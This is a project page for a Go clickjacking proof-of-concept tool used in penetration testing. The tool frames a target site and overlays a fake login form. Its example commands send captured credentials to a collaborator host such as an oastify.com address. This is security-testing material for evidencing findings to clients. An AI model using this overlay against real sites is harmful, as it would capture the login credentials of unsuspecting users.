← projects

go · clickjacking · red team

ClickJacker

ClickJacker is a clickjacking proof-of-concept tool written in Go. It loads a target URL in an iframe and overlays a fake login form on top, with submitted credentials POSTed to a collaborator address you supply. Providing the target URL as a positional argument is enough to get it running, and from there you can take a client-ready screenshot in a matter of seconds.

ClickJacker — localhost:9999
web page to clickjack:
collaborator address:

Live demo: really frames the target via frame-src https:. Captured credentials stay in your browser. The collaborator log is simulated.

What it does

Clickjacking works by exploiting a site that can be framed, and ClickJacker handles the setup. It frames the target to give the overlay some context, then drops a fake login form over the top. Credentials submitted through the overlay are POSTed to a collaborator address you supply, so you can demonstrate to a client exactly what an attacker would capture. Whether a target is actually vulnerable still requires some judgement on your part. Framebusting JavaScript and response headers can defeat framing in ways that are difficult to check automatically, so the tool gets the PoC in front of you and leaves the assessment to you.

A word on the name. Classic clickjacking tricks a user into clicking a real UI element through an invisible overlay, the kind of technique you would find in a PortSwigger lab. ClickJacker takes a different approach, framing the target for credibility and dropping a fake login form over the top instead, which tends to land as the higher-impact finding in most real engagements. The label is a slight stretch, but ClickJacker read better than go_frameable.

Written in Go, zero dependencies

The whole tool is the Go standard library, no third-party packages in go.mod. A few design decisions worth noting over the old static HTML approach:

  • Single static binary. The HTML template, CSS and fonts are baked in with //go:embed, so the build is one self-contained executable you can scp onto a jump box with nothing to install.
  • stdlib web server. A plain net/http server on :9999 renders an html/template seeded with the target and collaborator values.
  • Immediate CLI targeting. Positional arguments set the target URL and the collaborator address. No config files, no menus.
  • Optional logo. An --logo flag accepts a URL or local file path, or a logo file dropped next to the binary, and adds an image to the nav bar if you want to dress the page up for a specific engagement.
  • Opens the browser automatically. On launch it waits for the server to come up, then calls out to xdg-open, open, or rundll32 depending on the OS, so the PoC is on screen as soon as the binary runs.
  • Container-aware. Setting CONTAINER=TRUE skips the browser auto-open so it runs cleanly in Docker, and it stamps X-Frame-Options: Deny on its own responses so the tool itself cannot be framed.
# point it at a target, capture to your collaborator
clickjack https://app.acme.example https://x9k2.oastify.com

# optional: swap the nav-bar logo (URL or local file)
clickjack --logo ./logo.svg https://app.acme.example https://x9k2.oastify.com

# headless in Docker — CONTAINER=TRUE suppresses the browser auto-open
docker run -p 9999:9999 clickjacker https://app.acme.example

Why it saves time on multi-app engagements

Clickjacking is a relatively simple finding, but on an engagement with a large number of in-scope applications the manual process adds up. Building a framing PoC for each host means writing the HTML, hosting it, and taking a screenshot, and that repeats across each application and each authenticated route you want to evidence. ClickJacker reduces that to a single command per host, and from there it is a case of swapping the target argument and taking the next screenshot.

Authorised testing only. Use against systems you have explicit permission to assess.

source on github →